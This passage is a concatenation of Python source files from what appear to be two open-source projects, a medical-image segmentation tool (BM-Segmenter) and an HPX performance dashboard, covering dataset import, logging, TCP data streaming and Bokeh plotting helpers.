self._callback = None
self._total_time += time.time() - prev
if self._dynamic_fire_rate:
# Adapt the fire rate to the average measured callback duration
self._fire_rate = self._total_time / self._numcalls
def _fire_event(self):
if self._callback and time.time() - self._lastcall > self._fire_rate:
curdoc().add_next_tick_callback(self._call_and_measure)
self._lastcall = time.time()
``` |
{
"source": "jokteur/BM-Segmenter",
"score": 2
} |
#### File: src/scripts/dataset.py
```python
import toml
import os
from .workspace import get_dirs, get_root
def load_dataset(path: str):
"""Loads dataset into project."""
root_dir = get_root(path)
filename = os.path.join(root_dir, "dataset.toml")
result = {}
group_names = []
dirs = get_dirs(root_dir)[1]
if os.path.isfile(filename):
data = toml.load(os.path.join(root_dir, "dataset.toml"))
if "groups" in data and "files" in data:
group_names = list(data["groups"].keys())
for id in data["files"]:
dicom_dir = os.path.join(dirs["dicoms"], id)
groups = [name for name, files in data["groups"].items() if id in set(files)]
files = [os.path.join(dicom_dir, name) for name in os.listdir(dicom_dir)]
result[id] = {"groups": groups, "files": files}
return result, group_names
```
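A small usage sketch for `load_dataset`; the project file path is a placeholder and the `dataset.toml` written by `add_to_dataset` is assumed to exist:
```python
# Illustration only: the project path below is hypothetical.
dataset, group_names = load_dataset("/path/to/project/project.seg")
for case_id, info in dataset.items():
    print(case_id, info["groups"], len(info["files"]))
print(group_names)
```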
#### File: src/scripts/import_data.py
```python
import os
import numpy as np
import toml
from .workspace import get_dirs, create_series_dir
from .load_dicom import load_scan_from_dicom
def import_dicom(
path: str, root_dir: str, id: str, num: int, ww: int, wc: int, crop_x, crop_y, replace=False
):
"""Imports dicom as a numpy matrix in the project folder
Arguments
---------
path : str
path to the dicom file
root_dir : str
path to the root of the project
id : str
name of the case (should be a number followed by an underscore)
replace : bool
if True, the file is replaced even if it already exists
Returns
-------
True if saved successfully, False if the file already exists
"""
id_dir = create_series_dir(root_dir, id)
filename = os.path.join(id_dir[0], str(num))
if not os.path.isfile(filename + ".npz") or replace:
pixels, spacing, thickness, location = load_scan_from_dicom(path)
np.savez_compressed(
filename,
matrix=pixels,
spacing=np.array(spacing),
windowing=np.array([ww, wc]),
crop_x=crop_x,
crop_y=crop_y,
slice_info=np.array([thickness, location]),
)
return True
else:
return False
def add_to_dataset(paths: list, group_name: str, root_dir: str):
"""Adds the list of paths to the dataset toml"""
filename = os.path.join(root_dir, "dataset.toml")
data = {"files": set(), "groups": {group_name: set()}}
if os.path.isfile(filename):
data = toml.load(os.path.join(root_dir, "dataset.toml"))
if not "files" in data:
data["files"] = set()
if not "groups" in data:
data["groups"] = {}
if not group_name in data["groups"]:
data["groups"][group_name] = set()
data["groups"][group_name] = set(data["groups"][group_name])
data["files"] = set(data["files"])
for path in paths:
path = os.path.basename(path)
data["files"].add(path)
data["groups"][group_name].add(path)
toml.dump(data, open(filename, "w"))
```
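A hedged sketch of the import flow: `import_dicom` stores one DICOM slice as a compressed `.npz` inside the project, and `add_to_dataset` records the case id in `dataset.toml`. All paths, window settings and crop ranges below are placeholders:
```python
ok = import_dicom(
    path="/data/raw/slice_0001.dcm",  # hypothetical DICOM file
    root_dir="/path/to/project",      # hypothetical project root
    id="12_patient",
    num=0,
    ww=400,
    wc=40,
    crop_x=(0, 512),
    crop_y=(0, 512),
)
if ok:
    add_to_dataset(["12_patient"], group_name="train", root_dir="/path/to/project")
```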
#### File: src/scripts/segmentation.py
```python
import os
import toml
import numpy as np
from .workspace import get_dirs, get_root
from .util import make_safe_filename
def save_segmentation(project_file: str, name: str, description: str, filename: str, color: list):
"""Saves a segmentation to a file."""
root = get_root(project_file)
dirs = get_dirs(root)[1]
save_path = ""
if filename:
save_path = filename
else:
save_path = os.path.join(dirs["models"], make_safe_filename(name) + ".seg")
if os.path.isfile(save_path):
raise Exception("Segmentation with near identical name already exists")
try:
os.mkdir(os.path.join(dirs["masks"], make_safe_filename(name)))
except FileExistsError:
pass
data = {
"name": name,
"description": description,
"stripped_name": make_safe_filename(name),
"color": color,
}
toml.dump(data, open(save_path, "w"))
return save_path
def load_segmentations(root_dir: str):
if not os.path.isdir(root_dir):
raise Exception("Project path is not a directory")
dirs = get_dirs(root_dir)[1]
segmentations = []
for path in os.listdir(dirs["models"]):
path = os.path.join(dirs["models"], path)
if os.path.isfile(path) and path.endswith(".seg"):
data = toml.load(path)
data["path"] = path
data["ids"] = [
name[:-4] for name in os.listdir(os.path.join(dirs["masks"], data["stripped_name"]))
]
segmentations.append(data)
return segmentations
def get_mask_path(dicom_id: str, path: str, name: str):
dirs = get_dirs(os.path.dirname(os.path.dirname(path)))[1]
return os.path.join(dirs["masks"], name, dicom_id)
def save_mask_collection(users: list, current, validated, prediction, filename: str):
users = [str(u) for u in users]
np.savez_compressed(
filename,
current=current,
validated=validated,
predicted=prediction,
users=np.array(users, dtype="object"),
)
def load_mask_collection(filename):
filename = filename + ".npz"
data = {}
if os.path.isfile(filename):
data = np.load(filename, allow_pickle=True)
ret = {"users": []}
if "current" in data:
if data["current"].shape:
ret["current"] = data["current"]
if "predicted" in data:
if data["predicted"].shape:
ret["predicted"] = data["predicted"]
if "validated" in data:
if data["validated"].shape:
ret["validated"] = data["validated"]
if "users" in data:
ret["users"] = list(data["users"])
return ret
```
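An illustrative call sequence for the segmentation helpers; it assumes a project already created with `setup_workspace`, and the path and color are placeholders:
```python
project_file = "/path/to/project/project.seg"  # hypothetical
seg_file = save_segmentation(
    project_file,
    name="Left kidney",
    description="Manual kidney segmentation",
    filename=None,       # let the function derive the .seg path from the name
    color=[255, 0, 0],
)
for seg in load_segmentations(get_root(project_file)):
    print(seg["name"], seg["path"], seg["ids"])
```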
#### File: src/scripts/util.py
```python
from operator import itemgetter
import re
def special_sort(ids):
"""Sort first by number, then alphabetically.
Returns
-------
list : indices of the ids in sorted order (argsort-style)
list : the ids themselves in sorted order"""
numbers = {}
no_numbers = []
for i, id in enumerate(ids):
try:
digit = [not x.isdigit() for x in id].index(True)
except ValueError:
digit = len(id)
try:
number = int(id[:digit])
if not number in numbers:
numbers[number] = []
numbers[number].append((id, i))
except:
no_numbers.append((id, i))
numbers = sorted(numbers.items())
sorted_ids = []
for _, values in numbers:
sorted_ids += sorted(values)
sorted_ids += sorted(no_numbers)
return list(map(itemgetter(1), sorted_ids)), list(map(itemgetter(0), sorted_ids))
def make_safe_filename(s):
def safe_char(c):
if c.isalnum():
return c
else:
return "_"
stripped = "".join(safe_char(c) for c in s).rstrip("_")
return re.sub("_{2,}", "_", stripped)
```
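The two helpers above are easiest to understand from their outputs; a quick illustration:
```python
indices, sorted_ids = special_sort(["12_abc", "3_x", "foo"])
print(indices)     # [1, 0, 2]  (positions of the sorted ids in the input)
print(sorted_ids)  # ['3_x', '12_abc', 'foo']

print(make_safe_filename("My file (v2)!"))  # 'My_file_v2'
```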
#### File: src/scripts/workspace.py
```python
import os
from .util import make_safe_filename
def get_root(save_file: str):
return os.path.dirname(save_file)
def _make_folders(root: str):
try:
os.mkdir(os.path.join(root, "data"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "data", "dicoms"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "data", "masks"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "tmp"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "tmp", "train"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "tmp", "train", "x"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "tmp", "train", "y"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "models"))
except FileExistsError:
pass
def setup_workspace(path: str, name: str, extension):
if os.path.isdir(path):
name = make_safe_filename(name)
try:
os.mkdir(os.path.join(path, name))
_make_folders(os.path.join(path, name))
except FileExistsError:
pass
except OSError as e:
return False, f"Could not create directories: {e.what()}"
return True, os.path.join(path, name, f"{name}.{extension}")
else:
return False, "Path is not a directory"
def get_dirs(path: str):
"""
Fetches and returns the directory structure found at the path
"""
if os.path.isdir(path):
dirs = {}
if os.path.isdir(os.path.join(path, "data", "dicoms")):
dirs["dicoms"] = os.path.join(path, "data", "dicoms")
if os.path.isdir(os.path.join(path, "data", "masks")):
dirs["masks"] = os.path.join(path, "data", "masks")
if os.path.isdir(os.path.join(path, "models")):
dirs["models"] = os.path.join(path, "models")
if os.path.isdir(os.path.join(path, "data", "train", "x")):
dirs["train_x"] = os.path.join(path, "data", "train", "x")
if os.path.isdir(os.path.join(path, "data", "train", "y")):
dirs["train_y"] = os.path.join(path, "data", "train", "y")
return True, dirs
else:
return False, "Path is not a directory"
def create_series_dir(path: str, id: str):
"""Creates a director6'pè^¨$ for a Dicom Series in the data/dicom folder."""
_make_folders(path)
try:
os.mkdir(os.path.join(path, "data", "dicoms", id))
except FileExistsError:
return os.path.join(path, "data", "dicoms", id), False
return os.path.join(path, "data", "dicoms", id), True
``` |
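A sketch of creating a workspace and inspecting the folders it exposes; the base path and project name are placeholders:
```python
ok, project_file = setup_workspace("/path/to/projects", "My Project", "seg")
if ok:
    found, dirs = get_dirs(get_root(project_file))
    # dirs typically contains the 'dicoms', 'masks' and 'models' folders
    print(found, dirs)
```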
{
"source": "jokteur/hpx-dashboard",
"score": 3
} |
#### File: hpx_dashboard/agent/tcp_client.py
```python
import asyncio
import time
from ..common.constants import message_separator
from ..common.logger import Logger
async def connect(host: str, port: int, timeout=2):
""""""
writer = None
prev_time = time.time()
while True:
try:
_, writer = await asyncio.open_connection(host, port)
except (asyncio.TimeoutError, ConnectionRefusedError):
pass
if time.time() - prev_time > timeout:
break
if writer:
break
time.sleep(0.01)
return writer
async def send_data(host, port, timeout, queue, stop_signal):
""""""
writer = await connect(host, port, timeout)
logger = Logger()
if not writer:
logger.error(
f"Timeout error: could not connect to {host}:{port}" f" after {timeout} seconds"
)
stop_signal.stop = True
return
while True: # not stop_signal.stop:
line = queue.get()
if line is None:
break
try:
writer.write(line + message_separator)
await writer.drain()
except ConnectionResetError:
logger.error("Connection was reset while streaming data.")
break
queue.task_done()
return
```
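A rough sketch of driving `send_data` with a plain `queue.Queue` and a `None` sentinel to end the stream; the host, port and the minimal stop-signal object are assumptions made for illustration:
```python
import asyncio
import queue

class StopSignal:
    stop = False

q = queue.Queue()
q.put(b'{"counter": "threads/count/cumulative", "value": 42}')
q.put(None)  # sentinel: send_data returns when it reads None

asyncio.run(send_data("127.0.0.1", 5267, timeout=2, queue=q, stop_signal=StopSignal()))
```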
#### File: hpx_dashboard/common/logger.py
```python
import logging
import sys
from .singleton import Singleton
class Logger(metaclass=Singleton):
"""Logging class which is a wrapper around the logging module.
The Logger class is a wrapper around the logging module which allows multiple console output
or file output. Logger is a singleton.
"""
def __init__(self, name="hpx-dashboard", formatting="%(levelname)s - %(message)s"):
"""Sets the logging module with the specified format and logger name
Parameters
----------
name
name of the logging instance
formatting : optional
custom logging formatting string
"""
logging.basicConfig()
self.logger = logging.getLogger(name)
self.formatter = logging.Formatter(formatting)
self.handlers = []
self.name = name
handler = logging.NullHandler()
handler.setFormatter(self.formatter)
self.handlers.append(handler)
self.logger.addHandler(handler)
self.logger.setLevel(logging.INFO) # Default level
# Due to Bokeh serve messing up the logging module, this is a work-around
# to avoid printing the same message twice to the console
for h in logging.getLogger(name).handlers:
h.setFormatter(self.formatter)
self.log_file = None
def addHandler(self, handler, verbosity: int) -> None:
"""Adds a custom logging StreamHandler to the logging module
Parameters
----------
handler : StreamHandler
logging stream handler to add to the logging module
verbosity : int
2 (by default) : infos, warning and errors are printed
1 : only warning and errors are printed
0 : only errors are printed
"""
if int(verbosity) == 2:
handler.setLevel(logging.INFO)
elif int(verbosity) == 1:
handler.setLevel(logging.WARNING)
elif int(verbosity) == 0:
handler.setLevel(logging.ERROR)
handler.setFormatter(self.formatter)
self.handlers.append(handler)
self.logger.addHandler(handler)
def setLogFile(self, filename: str) -> None:
"""Specifies a file which will contain the log.
If there is already a log file, this function won't do anything.
Warning
-------
Beware that the logger will first erase any content which could be in
filename before writing the log.
"""
if not self.log_file:
# Erase any content of the file
with open(filename, "w") as file:
file.close()
file_log_handler = logging.FileHandler(filename)
file_log_handler.setFormatter(self.formatter)
self.logger.addHandler(file_log_handler)
self.log_file = filename
def setVerbosity(self, verbosity: int) -> None:
"""Sets the level of verbosity of the logger.
Parameters
----------
verbosity
2 (by default) : infos, warning and errors are printed
1 : only warning and errors are printed
0 : only errors are printed
"""
if int(verbosity) == 2:
self.logger.setLevel(logging.INFO)
elif int(verbosity) == 1:
self.logger.setLevel(logging.WARNING)
elif int(verbosity) == 0:
self.logger.setLevel(logging.ERROR)
def flush(self):
"""Flushes the last entry in all log handlers."""
for h in logging.getLogger(self.name).handlers:
h.flush()
# Dirty hack for flushing the console, because of the NullHandler
sys.stdout.write("\033[F") # back to previous line
sys.stdout.write("\033[K") # clear line
sys.stdout.flush()
def info(self, message: str, flush=False) -> None:
"""Emits an information in the log.
Parameters
----------
message
Message to be sent to the logger
flush
If True, flushes the last line in the console output"""
if flush:
self.flush()
self.logger.info(message)
def warning(self, message: str, flush=False) -> None:
"""Emits a warning in the log.
Parameters
----------
message
Message to be sent to the logger
flush
If True, flushes the last line in the console output"""
if flush:
self.flush()
self.logger.warning(message)
def error(self, message: str, flush=False) -> None:
"""Emits an error in the log.
Parameters
----------
message
Message to be sent to the logger
flush
If True, flushes the last line in the console output"""
if flush:
self.flush()
self.logger.error(message)
```
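Typical use of the singleton `Logger`; the log-file path is a placeholder:
```python
import logging
import sys

log = Logger()
log.addHandler(logging.StreamHandler(sys.stdout), verbosity=2)
log.setVerbosity(1)                       # only warnings and errors from now on
log.setLogFile("/tmp/hpx-dashboard.log")  # placeholder path
log.info("this message is filtered out at verbosity 1")
log.warning("agent connection is slow")
```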
#### File: server/data/collection.py
```python
from typing import Union
import hashlib
import numpy as np
import pandas as pd
from ...common.logger import Logger
from ...common.constants import task_cmap, task_plot_margin
logger = Logger()
class _NumpyArrayList:
"""This class allows for the growing of a numpy array of unknown size.
Using np.append() for each DataCollection.add_line would be a waste of resources.
This class is a wrapper around numpy arrays that efficiently allocates and
grows 2D numpy arrays.
"""
def __init__(self, size_x, dtype, capacity=100):
self.data = np.empty((capacity, size_x), dtype=dtype)
self.capacity = capacity
self.size = 0
self.size_x = size_x
self.dtype = dtype
def append(self, row):
if self.size == self.capacity:
self.capacity *= 2
new_data = np.empty((self.capacity, self.size_x))
new_data[: self.size] = self.data
self.data = new_data
for i, element in enumerate(row):
self.data[self.size, i] = element
self.size += 1
def replace(self, array):
self.data = array
self.capacity = len(array)
self.size = len(array)
def get(self):
return self.data[: self.size, :]
def format_instance(locality, pool=None, worker_id="total"):
""""""
return (str(locality), pool, str(worker_id))
def from_instance(instance):
"""Returns the locality id, pool and thread id from the str `instance`.
If `instance` is not valid, then None is returned."""
if isinstance(instance, tuple) or isinstance(instance, list):
if not len(instance) == 3:
return None
if isinstance(instance, list):
instance = tuple(instance)
return instance
elif isinstance(instance, str):
return instance, None, "total"
else:
return None
class DataCollection:
"""
The data collection class provides an interface for storing and reading hpx performance data"""
_id_counter = 0
def __init__(self):
self.start_time = None
self.end_time = None
self._counter_info = {}
self._data = {}
# Task data
self._task_data = {}
self._task_id = 0
self.instances = {}
# Variables for the growing numpy array
self._line_to_hash = {}
self._numpy_data = _NumpyArrayList(3, "float")
self._id = self._id_counter
self._id_counter += 1
self.timings = []
self.line_timing = []
def _add_instance_name(self, locality, pool=None, worker_id=None) -> None:
"""Adds the instance name to the list of instance names stored in the class."""
if not locality:
return
if locality not in self.instances:
self.instances[str(locality)] = {}
if pool not in self.instances[locality]:
self.instances[locality][pool] = {}
if worker_id not in self.instances[locality][pool]:
self.instances[locality][pool][worker_id] = []
def _get_instance_infos(self, full_instance: str) -> None:
""""""
if full_instance.startswith("/"):
return None, None, None
instance_split = full_instance.split("/")
locality = instance_split[0].split("#")[1]
worker_id = None
pool = None
if "total" in instance_split[1]:
worker_id = "total"
else:
if len(instance_split) == 2:
pool = None
worker_id = instance_split[1].split("#")[1]
elif "total" in instance_split[2]:
pool = instance_split[1].split("#")[1]
worker_id = "total"
else:
pool = instance_split[1].split("#")[1]
worker_id = instance_split[2].split("#")[1]
return locality, pool, worker_id
def add_task_data(
self, locality, worker_id: int, name, start: float, end: float, initial_capacity=1000
):
"""Adds one task to the task data of the collection.
This function also pre-builds the triangle mesh for the task plot that is used by datashader
Arguments
---------
locality : int
locality index of the task
worker_id : int
id of the worker
name : str
name of the task
start : float
timestamp of the beginning of the task
end : float
timestamp of the end of the task
initial_capacity : int
size of the pre-allocated numpy array where the data will be stored
(only used the first time the locality is encountered)
"""
import time
self._add_instance_name(locality, pool="default", worker_id=worker_id)
if locality not in self._task_data:
self._task_data[locality] = {
"data": _NumpyArrayList(4, "float", initial_capacity),
"verts": _NumpyArrayList(4, "float", initial_capacity * 4),
"tris": _NumpyArrayList(3, np.int, initial_capacity * 2),
"name_list": [],
"name_set": set(),
"min": np.finfo(float).max,
"max": np.finfo(float).min,
"workers": set(),
"min_time": float(start),
}
worker_id = float(worker_id)
start = float(start) # - self._task_data[locality]["min_time"]
end = float(end) # - self._task_data[locality]["min_time"]
if start < self._task_data[locality]["min"]:
self._task_data[locality]["min"] = start
if end > self._task_data[locality]["max"]:
self._task_data[locality]["max"] = end
top = worker_id + 1 / 2 * (1 - task_plot_margin)
bottom = worker_id - 1 / 2 * (1 - task_plot_margin)
self._task_data[locality]["name_list"].append(name)
self._task_data[locality]["name_set"].add(name)
self._task_data[locality]["workers"].add(worker_id)
color_hash = int(hashlib.md5(name.encode("utf-8")).hexdigest(), 16) % len(task_cmap)
t = time.time()
self._task_data[locality]["data"].append([worker_id, start, end, self._task_id])
t1 = time.time() - t
idx = self._task_data[locality]["verts"].size
# Bottom left pt
self._task_data[locality]["verts"].append([start, bottom, color_hash, self._task_id])
# Top left pt
self._task_data[locality]["verts"].append([start, top, color_hash, self._task_id])
# Top right pt
self._task_data[locality]["verts"].append([end, top, color_hash, self._task_id])
# Bottom right pt
self._task_data[locality]["verts"].append([end, bottom, color_hash, self._task_id])
self._task_id += 1
# Triangles
self._task_data[locality]["tris"].append([idx, idx + 1, idx + 2])
self._task_data[locality]["tris"].append([idx, idx + 2, idx + 3])
self.timings.append([t1])
def import_task_data(self, task_data, color_hash_dict=None):
"""Imports task data into the collection from a pandas DataFrame in one go.
This function exists to speed up bulk imports; otherwise it does the same thing as add_task_data.
Arguments
---------
task_data : pd.DataFrame
dataframe that should have the columns `name`, `locality`, `worker_id`, `start` and
`end`
color_hash_dict : dict
specify a custom color hash dictionary for the task names. This option should be used
together with the cmap option in the task plot.
"""
if task_data.empty:
return
self._task_data = {}
df = task_data.groupby("locality", sort=False)
for locality, group in df:
locality = str(locality)
group = group.reindex()
min_time = group["start"].min()
max_time = group["end"].max()
self._task_data[locality] = {
"data": _NumpyArrayList(4, "float"),
"verts": _NumpyArrayList(4, "float"),
"tris": _NumpyArrayList(3, np.int),
"name_list": group["name"].to_list(),
"min": min_time,
"max": max_time,
"workers": set(group["worker_id"].to_list()),
"min_time": min_time,
}
for worker_id in self._task_data[locality]["workers"]:
self._add_instance_name(locality, pool="default", worker_id=worker_id)
self._task_data[locality]["name_set"] = set(self._task_data[locality]["name_list"])
size = len(group)
group["index"] = np.arange(size)
if color_hash_dict:
group["color_hash"] = group["name"].apply(lambda name: color_hash_dict[name])
else:
group["color_hash"] = group["name"].apply(
lambda name: int(hashlib.md5(name.encode("utf-8")).hexdigest(), 16)
% len(task_cmap)
)
group["top"] = group["worker_id"] + 1 / 2 * (1 - task_plot_margin)
group["bottom"] = group["worker_id"] - 1 / 2 * (1 - task_plot_margin)
# Build the vertices
bottom_left = group[["start", "bottom", "color_hash", "index"]].rename(
columns={"start": "x", "bottom": "y"}
)
top_left = group[["start", "top", "color_hash", "index"]].rename(
columns={"start": "x", "top": "y"}
)
top_right = group[["end", "top", "color_hash", "index"]].rename(
columns={"end": "x", "top": "y"}
)
bottom_right = group[["end", "bottom", "color_hash", "index"]].rename(
columns={"end": "x", "bottom": "y"}
)
# Build the triangles indices
group["v1"] = group["index"] + size
group["v2"] = group["index"] + 2 * size
group["v3"] = group["index"] + 3 * size
tris_1 = group[["index", "v1", "v2"]].rename(columns={"index": "v0"})
tris_2 = group[["index", "v2", "v3"]].rename(
columns={"index": "v0", "v2": "v1", "v3": "v2"}
)
self._task_data[locality]["data"].replace(
group[["worker_id", "start", "end", "index"]].to_numpy()
)
self._task_data[locality]["verts"].replace(
pd.concat([bottom_left, top_left, top_right, bottom_right]).to_numpy().astype(float)
)
self._task_data[locality]["tris"].replace(pd.concat([tris_1, tris_2]).to_numpy())
def add_line(
self,
countername: str,
instance: Union[tuple, str],
parameters: Union[str, None],
sequence_number: int,
timestamp: float,
timestamp_unit: str,
value: str,
value_unit: Union[str, None],
) -> None:
"""Adds a line of data to the DataCollection.
Parameters
----------
countername
complete name of the performance counter without the full instance name
parameters
parameter(s) of the hpx performance counter
instance
counter instance name or tuple given by the format_instance function
sequence_number
sequence number of the counter invocation
timestamp
time stamp at which the information has been sampled
timestamp_unit
unit of the timestamp
value
actual counter value
(could be simple number or multiple numbers separated by ':')
value_unit
unit of the counter value
"""
name = countername
if parameters:
name = countername + "@" + parameters
if name not in self._data:
self._data[name] = {}
if isinstance(instance, tuple):
locality, pool, worker_id = instance
else:
locality, pool, worker_id = self._get_instance_infos(instance)
if locality:
self._add_instance_name(locality, pool, worker_id)
instance = format_instance(locality, pool, worker_id)
try:
value = float(value)
except ValueError:
value = str(value)
# Growing numpy array
key = (self._id, name, instance)
if key not in self._line_to_hash:
self._line_to_hash[key] = float(len(self._line_to_hash.keys()))
import time
t = time.time()
self._numpy_data.append([timestamp, value, self._line_to_hash[key]])
self.line_timing.append(time.time() - t)
line = [int(sequence_number), timestamp, timestamp_unit, value, value_unit]
if instance not in self._data[name]:
self._data[name][instance] = []
self._data[name][instance].append(line)
def get_counter_names(self):
"""Returns the list of available counters that are currently in the collection."""
return list(self._data.keys())
def task_mesh_data(self, locality):
""""""
if locality not in self._task_data:
return [[0, 0, 0, 0]], [[0, 0, 0]], ((0, 1), (0, 1))
# Find the plot ranges
max_worker_id = max(self._task_data[locality]["workers"])
min_time = self._task_data[locality]["min"]
max_time = self._task_data[locality]["max"]
vertices = pd.DataFrame(
self._task_data[locality]["verts"].get(), columns=["x", "y", "z", "patch_id"]
)
triangles = pd.DataFrame(
self._task_data[locality]["tris"].get().astype(int), columns=["v0", "v1", "v2"]
)
x_range = (min_time, max_time)
y_range = (-1 + task_plot_margin, max_worker_id + 1 / 2 * (1 - task_plot_margin))
return vertices, triangles, (x_range, y_range)
def get_data(self, countername: str, instance: tuple, index=0):
"""Returns the data of the specified countername and the instance.
Arguments
---------
countername : str
name of the HPX performance counter
instance : tuple
instance identifier (locality, pool, worker id) returned by the format_instance function
index : int
start from specified index
Returns
-------
ndarray where the columns in order are sequence number, timestamp, timestamp unit,
value and value unit
"""
if countername not in self._data:
return np.array([])
if instance in self._data[countername]:
if index >= len(self._data[countername][instance]):
return np.array([])
return np.array(self._data[countername][instance][index:], dtype="O")
else:
return np.array([])
def line_data(self):
return self._numpy_data.get()
def task_data(self, locality):
if locality not in self._task_data:
return [], []
return self._task_data[locality]["data"].get(), self._task_data[locality]["name_list"]
def get_task_names(self, locality):
if locality not in self._task_data:
return set()
return self._task_data[locality]["name_set"]
def get_localities(self):
"""Returns the list of available localities that are currently in the collection"""
return list(self.instances.keys())
def get_pools(self, locality):
"""Returns the list of available pools in a particular locality."""
if locality in self.instances:
pools = []
for pool in self.instances[locality].keys():
pools.append(pool)
return pools
else:
return []
def get_num_worker_threads(self, locality):
"""Returns the number of worker threads in a particular locality."""
num = 0
if locality in self.instances:
for pool in self.instances[locality].keys():
worker_list = [
int(idx) for idx in self.instances[locality][pool].keys() if idx != "total"
]
if worker_list:
num += max(worker_list) + 1
return num
def get_worker_threads(self, locality, pool=None):
"""Returns the list of worker threads in a particular locality and pool."""
if locality in self.instances:
if pool in self.instances[locality]:
return [idx for idx in self.instances[locality][pool].keys() if idx != "total"]
return []
def export_counter_data(self):
"""Returns a pandas DataFrame that contains all the HPX performance counter data."""
# Note: this is not the most efficient way to do this and for longer runs this can take a
# few hundred ms
dfs = [
pd.DataFrame(
columns=["sequence_number", "timestamp", "timestamp_unit", "value", "value_unit"]
)
]
for name in self._data.keys():
for instance in self._data[name].keys():
data = self.get_data(name, instance)
df = pd.DataFrame(
data,
columns=[
"sequence_number",
"timestamp",
"timestamp_unit",
"value",
"value_unit",
],
)
df["countername"] = name
locality, pool, thread = from_instance(instance)
df["locality"] = locality
df["pool"] = pool
df["thread"] = thread
dfs.append(df)
df = pd.concat(dfs).reset_index()
del df["index"]
return df
def export_task_data(self):
"""Returns a pandas DataFrame that contains all the HPX task data."""
dfs = [pd.DataFrame(columns=["worker_id", "start", "end", "name"])]
for locality in self.get_localities():
task_data, task_names = self.task_data(locality)
df = pd.DataFrame(task_data, columns=["worker_id", "start", "end", "name"])
df = df.astype({"worker_id": int})
df["locality"] = locality
df["name"] = task_names
dfs.append(df)
return pd.concat(dfs)
def set_start_time(self, start_time):
"""Sets the start start of the collection."""
self.start_time = start_time
def set_end_time(self, end_time):
"""Sets the end time of the collection."""
self.end_time = end_time
def set_counter_infos(self, counter_info):
"""Sets the counter infos of the collection."""
self._counter_info = counter_info
def line_to_hash(self, countername, instance):
"""Returns the associated hashed countername and instance stored in the object."""
key = (self._id, countername, instance)
if key not in self._line_to_hash:
self._line_to_hash[key] = float(len(self._line_to_hash.keys()))
return self._line_to_hash[key]
```
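A hand-fed `DataCollection` sketch to show the shape of the API; the counter name, task name and values are made up:
```python
dc = DataCollection()
instance = format_instance(locality=0, pool="default", worker_id=0)

dc.add_line(
    countername="threads/count/cumulative",
    instance=instance,
    parameters=None,
    sequence_number=1,
    timestamp=0.5,
    timestamp_unit="s",
    value="42",
    value_unit=None,
)
dc.add_task_data(locality="0", worker_id=0, name="fibonacci", start=0.0, end=0.1)

print(dc.get_counter_names())   # ['threads/count/cumulative']
print(dc.get_localities())      # ['0']
print(dc.export_counter_data().head())
```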
#### File: server/plots/base.py
```python
from abc import ABCMeta
from collections import OrderedDict
import random
import hashlib
import time
from bokeh.plotting import Figure
from bokeh import palettes
from ..data import DataAggregator
def get_figure_options():
""""""
o = Figure.properties()
o.add("tools")
o.add("x_axis_label")
o.add("y_axis_label")
return o
def get_colors(palette, names, order_list=True, shuffle=True):
"""Returns a list of colors from names with the associated color palette.
Arguments
---------
palette : str
name of bokeh color palette
names : list
list of names
order_list : bool
if True, then the names are sorted and attributed in order to the color palette.
if False, then the hashes of the names are used to identify the color. This means
that in this case, the color will always be the same for a unique name.
"""
palette_lookup = palettes.all_palettes[palette]
names = list(names)
# Take the biggest palette available
max_key = max(list(sorted(palette_lookup.keys())))
palette = palette_lookup[max_key]
# Some bokeh palettes repeat colors, we want just the unique set
palette = list(OrderedDict.fromkeys(palette))
if shuffle:
# Consistently shuffle palette - prevents just using low-range
random.Random(1324).shuffle(palette)
if order_list:
names.sort()
return [palette[i % len(palette)] for i in range(len(names))]
else:
# Quick and dirty hash table
return [
palette[int(hashlib.md5(n.encode("utf-8")).hexdigest(), 16) % len(palette)]
for n in names
]
class BaseElement(metaclass=ABCMeta):
""""""
instance_num = 0
def __init__(self, doc, refresh_rate=500, collection=None):
""""""
BaseElement.instance_num += 1
self._root = None
self._buffer = None
self._refresh_rate = refresh_rate
self._doc = doc
self._reset = False
self.set_collection(collection)
self._callback_object = doc.add_periodic_callback(self.update, refresh_rate)
def __del__(self):
if self._callback_object:
self._doc.remove_periodic_callback(self._callback_object)
def set_collection(self, collection):
self._collection = collection
if not collection:
self._select_most_recent_collection = True
self._collection = DataAggregator().get_live_collection()
else:
self._select_most_recent_collection = False
self._reset = True
def stop_update(self):
self._doc.remove_periodic_callback(self._callback_object)
def update(self):
if (
self._select_most_recent_collection
and self._collection != DataAggregator().get_live_collection()
):
self._collection = DataAggregator().get_live_collection()
self._reset = True
def layout(self):
return self._root
class ThrottledEvent:
_callback = None
_lastcall = 0
_numcalls = 0
_total_time = 0
def __init__(self, doc, fire_rate=None, refresh_rate=50):
"""fire_rate in ms"""
self._doc = doc
self._doc.add_periodic_callback(self._fire_event, refresh_rate)
if fire_rate:
self._dynamic_fire_rate = False
self._fire_rate = fire_rate / 1000
else:
self._dynamic_fire_rate = True
self._fire_rate = 0.05
def add_event(self, callback):
self._callback = callback
self._lastcall = time.time()
if time.time() - self._lastcall > self._fire_rate:
self._doc.add_next_tick_callback(self._call_and_measure)
def _call_and_measure(self):
self._numcalls += 1
self._lastcall = time.time()
prev = time.time()
self._callback()
self._callback = None
self._total_time += time.time() - prev
if self._dynamic_fire_rate:
# Use buffer (10)
self._fire_rate = self._total_time / self._numcalls
def _fire_event(self):
if self._callback and time.time() - self._lastcall > self._fire_rate:
self._doc.add_next_tick_callback(self._call_and_measure)
self._lastcall = time.time()
```
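`get_colors` keeps line colors stable across plots; a quick illustration:
```python
names = ["threads/idle-rate", "threads/count/cumulative"]

# Positional assignment over the sorted name list
print(get_colors("Category20", names))

# Hash-based assignment: the same name always maps to the same color
print(get_colors("Category20", names, order_list=False))
```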
#### File: server/plots/generator.py
```python
from collections import OrderedDict
from bokeh.plotting import Figure
from bokeh.layouts import column
from bokeh.models import Legend, LegendItem
import pandas as pd
from ..data import DataSources
from ..widgets import empty_placeholder
from .base import BaseElement, get_colors, get_figure_options
from .raster import ShadedTimeSeries
class TimeSeries(BaseElement):
""""""
def __init__(self, doc, shade=False, refresh_rate=500, print_stats=False, **kwargs):
""""""
super().__init__(doc, refresh_rate=refresh_rate)
self._defaults_opts = dict(
plot_width=800, plot_height=400, title="", x_axis_label="Time (s)"
)
self._defaults_opts.update(
